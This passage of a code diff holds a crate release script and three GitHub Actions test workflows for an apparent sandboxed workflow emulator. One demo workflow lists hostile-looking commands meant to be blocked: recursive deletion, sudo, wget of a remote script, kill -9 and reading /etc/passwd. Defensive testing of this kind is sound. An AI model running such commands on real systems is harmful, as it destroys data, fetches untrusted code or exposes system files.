publish_crates
|
||||
;;
|
||||
"release")
|
||||
echo "🚀 Starting release process..."
|
||||
echo ""
|
||||
|
||||
# Step 1: Update versions
|
||||
update_versions "$VERSION_TYPE"
|
||||
|
||||
# Step 2: Test build
|
||||
test_build
|
||||
|
||||
# Step 3: Show changelog info
|
||||
show_changelog_info
|
||||
|
||||
# Step 4: Publish (if not dry-run)
|
||||
if [[ "$DRY_RUN" != "--dry-run" ]]; then
|
||||
echo ""
|
||||
read -p "🤔 Continue with publishing? (y/N): " -n 1 -r
|
||||
echo
|
||||
if [[ $REPLY =~ ^[Yy]$ ]]; then
|
||||
publish_crates
|
||||
else
|
||||
echo "⏸️ Publishing cancelled. To publish later, run:"
|
||||
echo " $0 publish"
|
||||
fi
|
||||
else
|
||||
echo ""
|
||||
publish_crates
|
||||
fi
|
||||
;;
|
||||
esac
|
||||
|
||||
35
tests/safe_workflow.yml
Normal file
35
tests/safe_workflow.yml
Normal file
@@ -0,0 +1,35 @@
|
||||
name: Safe Workflow Test
|
||||
|
||||
on:
|
||||
push:
|
||||
workflow_dispatch:
|
||||
|
||||
jobs:
|
||||
safe_operations:
|
||||
name: Safe Operations
|
||||
runs-on: ubuntu-latest
|
||||
steps:
|
||||
- name: Checkout code
|
||||
uses: actions/checkout@v4
|
||||
|
||||
- name: List files
|
||||
run: ls -la
|
||||
|
||||
- name: Show current directory
|
||||
run: pwd
|
||||
|
||||
- name: Echo message
|
||||
run: echo "Hello, this is a safe command!"
|
||||
|
||||
- name: Create and read file
|
||||
run: |
|
||||
echo "test content" > safe-file.txt
|
||||
cat safe-file.txt
|
||||
rm safe-file.txt
|
||||
|
||||
- name: Show environment (safe)
|
||||
run: echo "GITHUB_WORKSPACE=$GITHUB_WORKSPACE"
|
||||
|
||||
- name: Check if Rust is available
|
||||
run: which rustc && rustc --version || echo "Rust not found"
|
||||
continue-on-error: true
|
||||
29
tests/security_comparison.yml
Normal file
29
tests/security_comparison.yml
Normal file
@@ -0,0 +1,29 @@
|
||||
name: Security Comparison Demo
|
||||
|
||||
on:
|
||||
push:
|
||||
workflow_dispatch:
|
||||
|
||||
jobs:
|
||||
safe_operations:
|
||||
name: Safe Operations (Works in Both Modes)
|
||||
runs-on: ubuntu-latest
|
||||
steps:
|
||||
- name: Checkout code
|
||||
uses: actions/checkout@v4
|
||||
|
||||
- name: List files
|
||||
run: ls -la
|
||||
|
||||
- name: Create and test file
|
||||
run: |
|
||||
echo "Hello World" > test.txt
|
||||
cat test.txt
|
||||
rm test.txt
|
||||
echo "File operations completed safely"
|
||||
|
||||
- name: Environment check
|
||||
run: |
|
||||
echo "Current directory: $(pwd)"
|
||||
echo "User: $(whoami)"
|
||||
echo "Available commands: ls, echo, cat work fine"
|
||||
92
tests/security_demo.yml
Normal file
92
tests/security_demo.yml
Normal file
@@ -0,0 +1,92 @@
|
||||
name: Security Demo Workflow
|
||||
|
||||
on:
|
||||
push:
|
||||
workflow_dispatch:
|
||||
|
||||
jobs:
|
||||
safe_commands:
|
||||
name: Safe Commands (Will Pass)
|
||||
runs-on: ubuntu-latest
|
||||
steps:
|
||||
- name: Checkout code
|
||||
uses: actions/checkout@v4
|
||||
|
||||
- name: List project files
|
||||
run: ls -la
|
||||
|
||||
- name: Show current directory
|
||||
run: pwd
|
||||
|
||||
- name: Echo a message
|
||||
run: echo "This command is safe and will execute successfully"
|
||||
|
||||
- name: Check Rust version (if available)
|
||||
run: rustc --version || echo "Rust not installed"
|
||||
|
||||
- name: Build documentation
|
||||
run: echo "Building docs..." && mkdir -p target/doc
|
||||
|
||||
- name: Show environment
|
||||
run: env | grep GITHUB
|
||||
|
||||
dangerous_commands:
|
||||
name: Dangerous Commands (Will Be Blocked)
|
||||
runs-on: ubuntu-latest
|
||||
steps:
|
||||
- name: Checkout code
|
||||
uses: actions/checkout@v4
|
||||
|
||||
# These commands will be blocked in secure emulation mode
|
||||
- name: Dangerous file deletion
|
||||
run: rm -rf /tmp/* # This will be BLOCKED
|
||||
continue-on-error: true
|
||||
|
||||
- name: System modification attempt
|
||||
run: sudo apt-get update # This will be BLOCKED
|
||||
continue-on-error: true
|
||||
|
||||
- name: Network download attempt
|
||||
run: wget https://example.com/script.sh # This will be BLOCKED
|
||||
continue-on-error: true
|
||||
|
||||
- name: Process manipulation
|
||||
run: kill -9 $$ # This will be BLOCKED
|
||||
continue-on-error: true
|
||||
|
||||
resource_intensive:
|
||||
name: Resource Limits Test
|
||||
runs-on: ubuntu-latest
|
||||
steps:
|
||||
- name: CPU intensive task
|
||||
run: |
|
||||
echo "Testing resource limits..."
|
||||
# This might hit CPU or time limits
|
||||
for i in {1..1000}; do
|
||||
echo "Iteration $i"
|
||||
sleep 0.1
|
||||
done
|
||||
continue-on-error: true
|
||||
|
||||
filesystem_test:
|
||||
name: Filesystem Access Test
|
||||
runs-on: ubuntu-latest
|
||||
steps:
|
||||
- name: Create files in allowed location
|
||||
run: |
|
||||
mkdir -p ./test-output
|
||||
echo "test content" > ./test-output/safe-file.txt
|
||||
cat ./test-output/safe-file.txt
|
||||
|
||||
- name: Attempt to access system files
|
||||
run: cat /etc/passwd # This may be blocked
|
||||
continue-on-error: true
|
||||
|
||||
- name: Show allowed file operations
|
||||
run: |
|
||||
echo "Safe file operations:"
|
||||
touch ./temp-file.txt
|
||||
echo "content" > ./temp-file.txt
|
||||
cat ./temp-file.txt
|
||||
rm ./temp-file.txt
|
||||
echo "File operations completed safely"
|
||||
Reference in New Issue
Block a user